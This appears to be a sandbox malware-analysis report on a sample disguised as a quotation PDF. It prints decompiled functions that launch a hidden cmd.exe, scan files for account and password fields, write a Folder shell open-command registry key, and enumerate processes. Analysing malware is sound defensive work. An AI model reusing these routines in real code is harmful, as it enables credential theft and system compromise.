				_t29 = CreateProcessA(_v8, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v96,  &_v28);
				_t48 = _t29;
				if(_t29 == 0) {
					return E0041E2A7(0, __eflags, _v12);
				}
				Sleep(0x3e8);
				E0041E2A7(0, _t48, _v12);
				return _v28.dwProcessId;
			}

0x0041154b
0x00411553
0x0041156d
0x00411578
0x00411581
0x0041158c
0x00411594
0x0041159e
0x004115ab
0x004115ac
0x004115ad
0x004115ae
0x004115cb
0x004115d1
0x004115d3
0x00000000
0x004115f6
0x004115da
0x004115e3
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040), ref: 00411567
GetWindowsDirectoryA.KERNEL32(004117B9,00000104), ref: 00411578
lstrlenA.KERNEL32(004117B9), ref: 00411581
CreateProcessA.KERNEL32(004117B9,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004115CB
Sleep.KERNEL32(000003E8), ref: 004115DA

Strings

\System32\cmd.exe, xrefs: 0041158D

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AllocCreateDirectoryProcessSleepVirtualWindowslstrlen
String ID: \System32\cmd.exe
API String ID: 2560724043-2003734499
Opcode ID: 4628db47f2e21abc435c7b1e1ab8cda6cbde27e9f195e6aa723090ced5ca8e45
Instruction ID: b226afd672287af3707e1faa9d6f850a3cf3f5a803a1b66904dba7024fa10c58
Opcode Fuzzy Hash: 4628db47f2e21abc435c7b1e1ab8cda6cbde27e9f195e6aa723090ced5ca8e45
Instruction Fuzzy Hash: 74115132B40208BBEB10ABE5DC07FDD7B79AB44711F200065F705F90E1DBB46A45A65C

Uniqueness

Uniqueness Score: -1.00%

Function 00411A14 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00411A14(intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				intOrPtr _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t12;
				intOrPtr _t13;

				if( *0x561710 == 0 ||  *0x5616ec == 0) {
					_v8 = GetModuleHandleW(L"ntdll.dll");
					 *0x561710 = GetProcAddress(_v8, "RtlNtStatusToDosError");
					_t9 = GetProcAddress(_v8, "RtlSetLastWin32Error");
					 *0x5616ec = _t9;
				}
				if( *0x561710 != 0 &&  *0x5616ec != 0) {
					_t12 =  *0x5616ec; // 0x0
					_v16 = _t12;
					_t13 =  *0x561710; // 0x0
					_v12 = _t13;
					return _v16(_v12(_a4));
				}
				return _t9;
			}

0x00411a21
0x00411a37
0x00411a48
0x00411a55
0x00411a5b
0x00411a5b
0x00411a67
0x00411a72
0x00411a77
0x00411a7a
0x00411a7f
0x00000000
0x00411a89
0x00411a8d

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,004123F7,00000000,00000040), ref: 00411A31
GetProcAddress.KERNEL32(?,RtlNtStatusToDosError), ref: 00411A42
GetProcAddress.KERNEL32(?,RtlSetLastWin32Error), ref: 00411A55

Strings

RtlSetLastWin32Error, xrefs: 00411A4D
RtlNtStatusToDosError, xrefs: 00411A3A
ntdll.dll, xrefs: 00411A2C

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
API String ID: 667068680-2897241497
Opcode ID: 8866eef3d34bbe6c745fa4dc8f321f3355d2a210cc1934c9b2734ca60bcb326c
Instruction ID: f57a0cd26781e6f680fdaa95aea420ef214658697b68d898f6033d863766921c
Opcode Fuzzy Hash: 8866eef3d34bbe6c745fa4dc8f321f3355d2a210cc1934c9b2734ca60bcb326c
Instruction Fuzzy Hash: A001BF78940604EFDB10DFA8E94A7A97FB4FB14345F584166E90293270D3B45A98EF4C

Uniqueness

Uniqueness Score: -1.00%

Function 004142D7 Relevance: 9.3, APIs: 6, Instructions: 340
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004142D7(intOrPtr __ecx, CHAR* _a4) {
				signed int _v5;
				signed int _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _v36;
				long _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				long _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				long _v92;
				signed int _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				signed int _t194;
				void* _t208;
				void* _t211;
				void* _t214;
				void* _t217;
				void* _t220;
				void* _t223;
				void* _t226;
				void* _t229;
				signed int _t277;
				void* _t279;
				void* _t282;
				void* _t285;
				void* _t288;
				void* _t291;
				void* _t294;
				void* _t297;
				signed int _t309;
				signed int _t321;
				signed char* _t326;
				signed char* _t340;
				signed char* _t361;
				void* _t365;
				void* _t366;

				_v84 = __ecx;
				_v36 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0, 0);
				if(_v36 != 0xffffffff) {
					_v40 = GetFileSize(_v36, 0);
					_v20 = E00401000(_v40);
					E0040132F(_v20, 0, _v40);
					_t366 = _t365 + 0xc;
					_v68 = _v68 & 0x00000000;
					ReadFile(_v36, _v20, _v40,  &_v68, 0);
					CloseHandle(_v36);
					 *0x42cc8d = 0;
					_t326 = _v20;
					__eflags = ( *_t326 & 0x000000ff) - 0xd0;
					if(( *_t326 & 0x000000ff) == 0xd0) {
						 *0x42cc8d = 1;
					}
					_v16 = E0040B7F4(0x400000, 0x3000);
					_v52 = E0040B7F4(0x104, 0x3000);
					_v56 = E0040B7F4(0x104, 0x3000);
					_v96 = _v96 | 0xffffffff;
					_v12 = _v12 & 0x00000000;
					_v5 = 0;
					_v24 = _v24 & 0x00000000;
					while(1) {
						__eflags = _v24 - _v40;
						if(_v24 >= _v40) {
							break;
						}
						__eflags = ( *(_v20 + _v24) & 0x000000ff) - 0x20;
						if(( *(_v20 + _v24) & 0x000000ff) <= 0x20) {
							L44:
							_t194 = _v24 + 1;
							__eflags = _t194;
							_v24 = _t194;
							continue;
						}
						__eflags = ( *(_v20 + _v24) & 0x000000ff) - 0x7f;
						if(( *(_v20 + _v24) & 0x000000ff) >= 0x7f) {
							goto L44;
						}
						__eflags = ( *(_v20 + _v24) & 0x000000ff) - 0x3d;
						if(( *(_v20 + _v24) & 0x000000ff) == 0x3d) {
							goto L44;
						}
						 *((char*)(_v16 + _v12)) =  *(_v20 + _v24);
						_v12 = _v12 + 1;
						__eflags = _v5 & 0x000000ff;
						if((_v5 & 0x000000ff) != 0) {
							__eflags = _v5 & 0x000000ff;
							if((_v5 & 0x000000ff) == 0) {
								goto L44;
							}
							_t208 = _v16 + _v12;
							__eflags =  *((char*)(_t208 - 8)) - 0x50;
							if( *((char*)(_t208 - 8)) != 0x50) {
								goto L44;
							}
							_t211 = _v16 + _v12;
							__eflags =  *((char*)(_t211 - 7)) - 0x61;
							if( *((char*)(_t211 - 7)) != 0x61) {
								goto L44;
							}
							_t214 = _v16 + _v12;
							__eflags =  *((char*)(_t214 - 6)) - 0x73;
							if( *((char*)(_t214 - 6)) != 0x73) {
								goto L44;
							}
							_t217 = _v16 + _v12;
							__eflags =  *((char*)(_t217 - 5)) - 0x73;
							if( *((char*)(_t217 - 5)) != 0x73) {
								goto L44;
							}
							_t220 = _v16 + _v12;
							__eflags =  *((char*)(_t220 - 4)) - 0x77;
							if( *((char*)(_t220 - 4)) != 0x77) {
								goto L44;
							}
							_t223 = _v16 + _v12;
							__eflags =  *((char*)(_t223 - 3)) - 0x6f;
							if( *((char*)(_t223 - 3)) != 0x6f) {
								goto L44;
							}
							_t226 = _v16 + _v12;
							__eflags =  *((char*)(_t226 - 2)) - 0x72;
							if( *((char*)(_t226 - 2)) != 0x72) {
								goto L44;
							}
							_t229 = _v16 + _v12;
							__eflags =  *((char*)(_t229 - 1)) - 0x64;
							if( *((char*)(_t229 - 1)) != 0x64) {
								goto L44;
							}
							_v28 = _v24 + 9;
							_t340 = _v20;
							__eflags = ( *_t340 & 0x000000ff) - 0xd0;
							if(( *_t340 & 0x000000ff) == 0xd0) {
								_t277 = _v24 + 2;
								__eflags = _t277;
								_v28 = _t277;
							}
							_t125 =  &_v48;
							 *_t125 = _v48 & 0x00000000;
							__eflags =  *_t125;
							while(1) {
								__eflags = ( *(_v20 + _v28) & 0x000000ff) - 0x20;
								if(__eflags <= 0) {
									break;
								}
								__eflags = ( *(_v20 + _v28) & 0x000000ff) - 0x7f;
								if(__eflags >= 0) {
									break;
								}
								__eflags = ( *(_v20 + _v28) & 0x000000ff) - 0x21;
								if(__eflags == 0) {
									break;
								}
								 *((char*)(_v56 + _v48)) =  *(_v20 + _v28);
								_v48 = _v48 + 1;
								_v28 = _v28 + 1;
							}
							 *((char*)(_v56 + _v48)) = 0;
							E00419976( &_v112, __eflags);
							E00406B58( &_v64, _v56);
							E00406B58( &_v60, _v52);
							E00406BFC( &_v104, E00406770( &_v64, __eflags,  &_v72));
							E00406BE2();
							E00406BFC( &_v108, E00406770( &_v60, __eflags,  &_v76));
							E00406BE2();
							_v100 = 5;
							E00406BFC( &_v112, E00406F64( &_v80, 0x428db4));
							E00406BE2();
							_v88 = _v84;
							E00403CD2(_t366 - 0x10,  &_v112);
							E00403E71(_v88);
							E00406B06();
							E00406B06();
							E004018BB( &_v112, __eflags);
							break;
						}
						__eflags = _v12 - 7;
						if(_v12 <= 7) {
							L26:
							goto L44;
						}
						_t279 = _v16 + _v12;
						__eflags =  *((char*)(_t279 - 7)) - 0x41;
						if( *((char*)(_t279 - 7)) != 0x41) {
							goto L26;
						}
						_t282 = _v16 + _v12;
						__eflags =  *((char*)(_t282 - 6)) - 0x63;
						if( *((char*)(_t282 - 6)) != 0x63) {
							goto L26;
						}
						_t285 = _v16 + _v12;
						__eflags =  *((char*)(_t285 - 5)) - 0x63;
						if( *((char*)(_t285 - 5)) != 0x63) {
							goto L26;
						}
						_t288 = _v16 + _v12;
						__eflags =  *((char*)(_t288 - 4)) - 0x6f;
						if( *((char*)(_t288 - 4)) != 0x6f) {
							goto L26;
						}
						_t291 = _v16 + _v12;
						__eflags =  *((char*)(_t291 - 3)) - 0x75;
						if( *((char*)(_t291 - 3)) != 0x75) {
							goto L26;
						}
						_t294 = _v16 + _v12;
						__eflags =  *((char*)(_t294 - 2)) - 0x6e;
						if( *((char*)(_t294 - 2)) != 0x6e) {
							goto L26;
						}
						_t297 = _v16 + _v12;
						__eflags =  *((char*)(_t297 - 1)) - 0x74;
						if( *((char*)(_t297 - 1)) != 0x74) {
							goto L26;
						}
						_v32 = _v24 + 9;
						_t361 = _v20;
						__eflags = ( *_t361 & 0x000000ff) - 0xd0;
						if(( *_t361 & 0x000000ff) == 0xd0) {
							_t321 = _v24 + 2;
							__eflags = _t321;
							_v32 = _t321;
						}
						_t77 =  &_v44;
						 *_t77 = _v44 & 0x00000000;
						__eflags =  *_t77;
						while(1) {
							__eflags = ( *(_v20 + _v32) & 0x000000ff) - 0x20;
							if(( *(_v20 + _v32) & 0x000000ff) <= 0x20) {
								break;
							}
							__eflags = ( *(_v20 + _v32) & 0x000000ff) - 0x7f;
							if(( *(_v20 + _v32) & 0x000000ff) >= 0x7f) {
								break;
							}
							 *((char*)(_v52 + _v44)) =  *(_v20 + _v32);
							_v32 = _v32 + 1;
							_v44 = _v44 + 1;
						}
						_t309 = _v52 + _v44;
						__eflags = _t309;
						 *_t309 = 0;
						_v5 = 1;
						goto L26;
					}
					E0040B7DF(_v52);
					E0040B7DF(_v56);
					E0040B7DF(_v16);
					return E00401014(_v20);
				}
				_v92 = GetLastError();
				return CloseHandle(_v36);
			}

0x004142dd
0x004142f8
0x004142ff
0x00414323
0x0041432f
0x0041433a
0x0041433f
0x00414342
0x00414355
0x0041435e
0x00414364
0x00414371
0x00414378
0x0041437d
0x0041437f
0x0041437f
0x00414397
0x004143ab
0x004143bf
0x004143c2
0x004143c6
0x004143ca
0x004143ce
0x004143db
0x004143de
0x004143e1
0x00000000
0x00000000
0x004143f0
0x004143f3
0x0041472d
0x004143d7
0x004143d7
0x004143d8
0x00000000
0x004143d8
0x00414402
0x00414405
0x00000000
0x00000000
0x00414414
0x00414417
0x00000000
0x00000000
0x0041442b
0x00414431
0x00414438
0x0041443a
0x00414546
0x00414548
0x00000000
0x00000000
0x00414551
0x00414558
0x0041455b
0x00000000
0x00000000
0x00414564
0x0041456b
0x0041456e
0x00000000
0x00000000
0x00414577
0x0041457e
0x00414581
0x00000000
0x00000000
0x0041458a
0x00414591
0x00414594
0x00000000
0x00000000
0x0041459d
0x004145a4
0x004145a7
0x00000000
0x00000000
0x004145b0
0x004145b7
0x004145ba
0x00000000
0x00000000
0x004145c3
0x004145ca
0x004145cd
0x00000000
0x00000000
0x004145d6
0x004145dd
0x004145e0
0x00000000
0x00000000
0x004145ec
0x004145f5
0x004145fc
0x00414601
0x00414607
0x00414607
0x00414608
0x00414608
0x0041460b
0x0041460b
0x0041460b
0x0041460f
0x00414618
0x0041461b
0x00000000
0x00000000
0x00414626
0x00414629
0x00000000
0x00000000
0x00414634
0x00414637
0x00000000
0x00000000
0x00414647
0x0041464d
0x00414654
0x00414654
0x0041465f
0x00414665
0x00414670
0x0041467b
0x00414690
0x00414698
0x004146ad
0x004146b5
0x004146ba
0x004146d2
0x004146da
0x004146e2
0x004146ee
0x004146f6
0x004146fe
0x00414706
0x0041470e
0x00000000
0x0041470e
0x00414440
0x00414444
0x0041453d
0x00000000
0x0041453d
0x0041444d
0x00414454
0x00414457
0x00000000
0x00000000
0x00414460
0x00414467
0x0041446a
0x00000000
0x00000000
0x00414473
0x0041447a
0x0041447d
0x00000000
0x00000000
0x00414486
0x0041448d
0x00414490
0x00000000
0x00000000
0x00414499
0x004144a0
0x004144a3
0x00000000
0x00000000
0x004144ac
0x004144b3
0x004144b6
0x00000000
0x00000000
0x004144bf
0x004144c6
0x004144c9
0x00000000
0x00000000
0x004144d1
0x004144da
0x004144e1
0x004144e6
0x004144ec
0x004144ec
0x004144ed
0x004144ed
0x004144f0
0x004144f0
0x004144f0
0x004144f4
0x004144fd
0x00414500
0x00000000
0x00000000
0x0041450b
0x0041450e
0x00000000
0x00000000
0x0041451e
0x00414524
0x0041452b
0x0041452b
0x00414533
0x00414533
0x00414536
0x00414539
0x00000000
0x00414539
0x00414735
0x0041473e
0x00414747
0x00000000
0x00414755
0x00414307
0x00000000

APIs

CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004142F2
GetLastError.KERNEL32 ref: 00414301
CloseHandle.KERNEL32(000000FF), ref: 0041430D
GetFileSize.KERNEL32(000000FF,00000000), ref: 0041431D
ReadFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 00414355
CloseHandle.KERNEL32(000000FF), ref: 0041435E

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateErrorLastReadSize
String ID:
API String ID: 1366138817-0
Opcode ID: 78cae987cc399f52d8fda770d7aa537b5a0ad4197742c96eadccf265ade47546
Instruction ID: 6484463fb5d0650934a9409472dc38820e8be8cd796dfe52ebc3d465caca82c7
Opcode Fuzzy Hash: 78cae987cc399f52d8fda770d7aa537b5a0ad4197742c96eadccf265ade47546
Instruction Fuzzy Hash: 1BE15B71D041589FCF01DBA4D891BEEBBF5AF11319F6440A6E061FB291C738AA96CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00419F73 Relevance: 9.1, APIs: 6, Instructions: 77
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00419F73(void* __ecx, WCHAR* _a4, void** _a8, long* _a12) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				long* _t38;

				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				if( *0x42cec0 == 0) {
					_v8 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0, 0);
					if(_v8 != 0 && _v8 != 0xffffffff) {
						_t38 =  &_v28;
						__imp__GetFileSizeEx(_v8, _t38);
						if(_t38 != 0 && _v24 == 0) {
							 *_a12 = _v28;
							 *_a8 = LocalAlloc(0x40,  *_a12);
							if( *_a8 != 0) {
								if(ReadFile(_v8,  *_a8,  *_a12,  &_v20, 0) == 0 ||  *_a12 != _v20) {
									_v16 = _v16 & 0x00000000;
								} else {
									_v16 = 1;
								}
								_v12 = _v16;
								if(_v12 == 0) {
									LocalFree( *_a8);
								}
							}
						}
						CloseHandle(_v8);
					}
				} else {
					_v12 = E0041A064(__ecx, _a4, _a8, _a12);
				}
				return _v12;
			}

0x00419f79
0x00419f7d
0x00419f88
0x00419fbb
0x00419fc2
0x00419fd2
0x00419fd9
0x00419fe1
0x00419fef
0x0041a001
0x0041a009
0x0041a026
0x0041a03b
0x0041a032
0x0041a032
0x0041a032
0x0041a042
0x0041a049
0x0041a050
0x0041a050
0x0041a049
0x0041a009
0x0041a059
0x0041a059
0x00419f8a
0x00419f9b
0x00419f9b
0x0041a063

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,?,?,0041A452,00000000), ref: 00419FB5
GetFileSizeEx.KERNEL32(000000FF,?,?,?,0041A452,00000000), ref: 00419FD9
LocalAlloc.KERNEL32(00000040,0041A452), ref: 00419FF8
ReadFile.KERNEL32(000000FF,00000000,0041A452,0041A452,00000000), ref: 0041A01E
LocalFree.KERNEL32(00000000), ref: 0041A050
CloseHandle.KERNEL32(000000FF,?,?,0041A452,00000000), ref: 0041A059

Part of subcall function 0041A064: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,00419F98,00000000,00000000), ref: 0041A088
Part of subcall function 0041A064: LocalAlloc.KERNEL32(00000040,00419F98,?,?,00419F98,00000000,00000000), ref: 0041A099
Part of subcall function 0041A064: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,00419F98,00000000,00000000), ref: 0041A0BF
Part of subcall function 0041A064: LocalFree.KERNEL32(00000000,?,?,00419F98,00000000,00000000), ref: 0041A0D3

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Local$File$AllocBinaryCryptFreeString$CloseCreateHandleReadSize
String ID:
API String ID: 2101750478-0
Opcode ID: bdbe2ebb68708fed584bceafae07be019644118bc9403f6ae650dc0fd2fc9b24
Instruction ID: fc81ab88a69f5a296527fa697e1d05123b49744b73e7dffecd994e8126300678
Opcode Fuzzy Hash: bdbe2ebb68708fed584bceafae07be019644118bc9403f6ae650dc0fd2fc9b24
Instruction Fuzzy Hash: 14313630A01208EFDF21CF94DD45BEE7BB1FF09305F108069F915AA2A0D3759AA1DB09

Uniqueness

Uniqueness Score: -1.00%

Function 00421694 Relevance: 9.0, APIs: 6, Instructions: 39
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00421694(void* _a4, char* _a8, char* _a12, CHAR* _a16) {
				long _v8;
				void* _v12;
				int _v16;

				_v16 = lstrlenA(_a16);
				_v8 = RegOpenKeyExA(_a4, _a8, 0, 0x20006,  &_v12);
				if(_v8 == 0) {
					_v8 = RegSetValueExA(_v12, _a12, 0, 1, _a16, _v16);
					RegCloseKey(_v12);
					if(_v8 == 0) {
						return 1;
					}
					SetLastError(_v8);
					return 0;
				}
				SetLastError(_v8);
				return 0;
			}

0x004216a3
0x004216bd
0x004216c4
0x004216e9
0x004216ef
0x004216f9
0x00000000
0x00421708
0x004216fe
0x00000000
0x00421704
0x004216c9
0x00000000

APIs

lstrlenA.KERNEL32(?,Software\Classes\Folder\shell\open\command,0042649B,?), ref: 0042169D
RegOpenKeyExA.ADVAPI32(00020006,00000000,00000000,00020006,?), ref: 004216B7
SetLastError.KERNEL32(00000000), ref: 004216C9
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?), ref: 004216E3
RegCloseKey.ADVAPI32(?), ref: 004216EF
SetLastError.KERNEL32(00000000), ref: 004216FE

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: ErrorLast$CloseOpenValuelstrlen
String ID:
API String ID: 1150107030-0
Opcode ID: 1df67cba8c74ea853d10ad07e330d6b7cfa3344a0e1fa25de3e33cac87e3c2c8
Instruction ID: add4b9ad7489538f0dad00db528424f62e837a396539d00d1178d4128130759d
Opcode Fuzzy Hash: 1df67cba8c74ea853d10ad07e330d6b7cfa3344a0e1fa25de3e33cac87e3c2c8
Instruction Fuzzy Hash: D701A534A01208FBDF119FA0ED09B9EBBB6AB04302F5140A1F501A6171C7765A66EF18

Uniqueness

Uniqueness Score: -1.00%

Function 0041E681 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 149
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041E681() {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _v12;
				intOrPtr _v16;
				signed int _v18;
				signed int _v24;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				char _v300;

				_v300 = 0x11c;
				_v8 = LoadLibraryA("ntdll.dll");
				if(_v8 == 0) {
					L4:
					if(_v284 != 2) {
						L57:
						return 0;
					}
					if((_v18 & 0x000000ff) != 1) {
						if((_v18 & 0x000000ff) == 2 || (_v18 & 0x000000ff) == 3) {
							if(_v296 != 5 || _v292 != 1) {
								if(_v296 != 5 || _v292 != 2) {
									if(_v296 != 6 || _v292 != 0) {
										if(_v296 != 6 || _v292 != 1) {
											if(_v296 != 6 || _v292 != 2) {
												if(_v296 != 6 || _v292 != 3) {
													if(_v296 != 0xa || _v292 != 0) {
														goto L57;
													} else {
														return (_v24 & 0x0000ffff) + 0x2710;
													}
												} else {
													return (_v24 & 0x0000ffff) + 0x189c;
												}
											} else {
												return (_v24 & 0x0000ffff) + 0x1838;
											}
										} else {
											return (_v24 & 0x0000ffff) + 0x17d4;
										}
									} else {
										return (_v24 & 0x0000ffff) + 0x1770;
									}
								} else {
									return (_v24 & 0x0000ffff) + 0x1450;
								}
							} else {
								return (_v24 & 0x0000ffff) + 0x13ec;
							}
						} else {
							goto L57;
						}
					}
					if(_v296 != 5 || _v292 != 0) {
						if(_v296 != 5 || _v292 != 1) {
							if(_v296 != 5 || _v292 != 2) {
								if(_v296 != 6 || _v292 != 0) {
									if(_v296 != 6 || _v292 != 1) {
										if(_v296 != 6 || _v292 != 2) {
											if(_v296 != 6 || _v292 != 3) {
												if(_v296 != 0xa || _v288 >= 0x4e20) {
													if(_v296 != 0xa || _v288 <= 0x4e20) {
														goto L57;
													} else {
														return (_v24 & 0x0000ffff) + 0x44c;
													}
												} else {
													return (_v24 & 0x0000ffff) + 0x3e8;
												}
											} else {
												return (_v24 & 0x0000ffff) + 0x276;
											}
										} else {
											return (_v24 & 0x0000ffff) + 0x26c;
										}
									} else {
										return (_v24 & 0x0000ffff) + 0x262;
									}
								} else {
									return (_v24 & 0x0000ffff) + 0x258;
								}
							} else {
								return (_v24 & 0x0000ffff) + 0x208;
							}
						} else {
							return (_v24 & 0x0000ffff) + 0x1fe;
						}
					} else {
						return (_v24 & 0x0000ffff) + 0x1f4;
					}
				}
				_v12 = GetProcAddress(_v8, "RtlGetVersion");
				if(_v12 != 0) {
					_v16 = _v12;
					_v16( &_v300);
					goto L4;
				}
				return 0;
			}

0x0041e68a
0x0041e69f
0x0041e6a6
0x0041e6d6
0x0041e6dd
0x0041e92e
0x00000000
0x0041e92e
0x0041e6ea
0x0041e841
0x0041e857
0x0041e877
0x0041e89c
0x0041e8bb
0x0041e8da
0x0041e8f9
0x0041e918
0x00000000
0x0041e923
0x00000000
0x0041e927
0x0041e904
0x00000000
0x0041e908
0x0041e8e5
0x00000000
0x0041e8e9
0x0041e8c6
0x00000000
0x0041e8ca
0x0041e8a7
0x00000000
0x0041e8ab
0x0041e882
0x00000000
0x0041e886
0x0041e862
0x00000000
0x0041e866
0x00000000
0x00000000
0x00000000
0x0041e841
0x0041e6f7
0x0041e71c
0x0041e741
0x0041e766
0x0041e78b
0x0041e7b0
0x0041e7d2
0x0041e7f4
0x0041e819
0x00000000
0x0041e827
0x00000000
0x0041e82b
0x0041e802
0x00000000
0x0041e806
0x0041e7dd
0x00000000
0x0041e7e1
0x0041e7bb
0x00000000
0x0041e7bf
0x0041e796
0x00000000
0x0041e79a
0x0041e771
0x00000000
0x0041e775
0x0041e74c
0x00000000
0x0041e750
0x0041e727
0x00000000
0x0041e72b
0x0041e702
0x00000000
0x0041e706
0x0041e6f7
0x0041e6b6
0x0041e6bd
0x0041e6c9
0x0041e6d3
0x00000000
0x0041e6d3
0x00000000

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 0041E699
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0041E6B0

Strings

N, xrefs: 0041E81B
ntdll.dll, xrefs: 0041E694
RtlGetVersion, xrefs: 0041E6A8

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: N$RtlGetVersion$ntdll.dll
API String ID: 2574300362-1635223601
Opcode ID: 800e8dab45a7cb6fbf4c15fc51980e8379ac31d5e496d4a1f31cee92913333e0
Instruction ID: c2e4971e59f982bd1f815425ddb747a7519468bc3292795e2bede65a97b05f60
Opcode Fuzzy Hash: 800e8dab45a7cb6fbf4c15fc51980e8379ac31d5e496d4a1f31cee92913333e0
Instruction Fuzzy Hash: 19612D78C15229CADF709B53CA053FEB2B0AB1931AF1005A7E88565291D33C8EE5DA1F

Uniqueness

Uniqueness Score: -1.00%

Function 004224A3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67
processCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004224A3(void* __ecx, void* __eflags, intOrPtr* _a4) {
				signed int _v5;
				signed int _v6;
				intOrPtr* _v12;
				intOrPtr* _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v292;
				signed int _v320;
				void* _v328;
				signed int _t48;

				_v28 = _v28 & 0x00000000;
				_v20 = CreateToolhelp32Snapshot(2, 0);
				E0040132F( &_v328, 0, 0x128);
				_v328 = 0x128;
				_t7 =  &_v20; // 0x422368
				if(Process32First( *_t7,  &_v328) == 0) {
					L11:
					CloseHandle(_v20);
					return 0;
				} else {
					goto L1;
				}
				do {
					L1:
					_v16 = _a4;
					_v12 =  &_v292;
					while(1) {
						_t48 =  *_v12;
						_v5 = _t48;
						if(_t48 !=  *_v16) {
							break;
						}
						if(_v5 == 0) {
							L6:
							_v24 = _v24 & 0x00000000;
							L8:
							_v32 = _v24;
							if(_v32 != 0) {
								goto L10;
							}
							_v28 = _v320;
							return _v28;
						}
						_t48 =  *((intOrPtr*)(_v12 + 1));
						_v6 = _t48;
						if(_t48 !=  *((intOrPtr*)(_v16 + 1))) {
							break;
						}
						_v12 = _v12 + 2;
						_v16 = _v16 + 2;
						if(_v6 != 0) {
							continue;
						}
						goto L6;
					}
					asm("sbb eax, eax");
					_v24 = _t48 | 0x00000001;
					goto L8;
					L10:
				} while (Process32Next(_v20,  &_v328) != 0);
				goto L11;
			}

0x004224ac
0x004224ba
0x004224cb
0x004224d3
0x004224e4
0x004224ef
0x0042257a
0x0042257d
0x00000000
0x00000000
0x00000000
0x00000000
0x004224f5
0x004224f5
0x004224f8
0x00422501
0x00422504
0x00422507
0x00422509
0x00422511
0x00000000
0x00000000
0x00422517
0x00422538
0x00422538
0x00422546
0x00422549
0x00422550
0x00000000
0x00000000
0x00422558
0x00000000
0x0042255b
0x0042251c
0x0042251f
0x00422528
0x00000000
0x00000000
0x0042252a
0x0042252e
0x00422536
0x00000000
0x00000000
0x00000000
0x00422536
0x0042253e
0x00422543
0x00000000
0x00422562
0x00422572
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004224B4
Process32First.KERNEL32(h#B,00000128), ref: 004224E7
CloseHandle.KERNEL32(?), ref: 0042257D

